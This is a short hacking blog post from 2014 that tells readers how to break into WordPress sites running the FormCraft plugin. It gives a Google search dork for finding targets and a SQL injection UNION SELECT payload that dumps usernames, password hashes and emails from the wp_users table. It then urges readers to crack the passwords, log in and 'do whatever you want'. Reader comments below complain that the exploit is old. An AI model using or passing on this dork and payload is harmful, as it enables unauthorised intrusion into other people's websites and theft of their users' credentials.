Friday, January 17, 2014

Wordpress Site hacking Via SQLi



dork : inurl:/wp-content/plugins/formcraft/form.php?id=

exploit link :

form.php?id=3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_pass,0x3a,user_email),5,6,7,8,9,10,11 FROM wp_users--

Username & Password will appear. Crack the pass then login & do whatever you want :)
Facebook Comment Box : Bloggerized by www.sakibsami.com

3 comments:

  1. vai aktu jodi bujaia diten kamna korta hoba....

    ReplyDelete
  2. I am glad to find your impressive way of writing the post.Thanks for sharing the post.Also see my website. IT consultant company

    ReplyDelete
  3. bradar old exploit :( . new lagbo :(

    ReplyDelete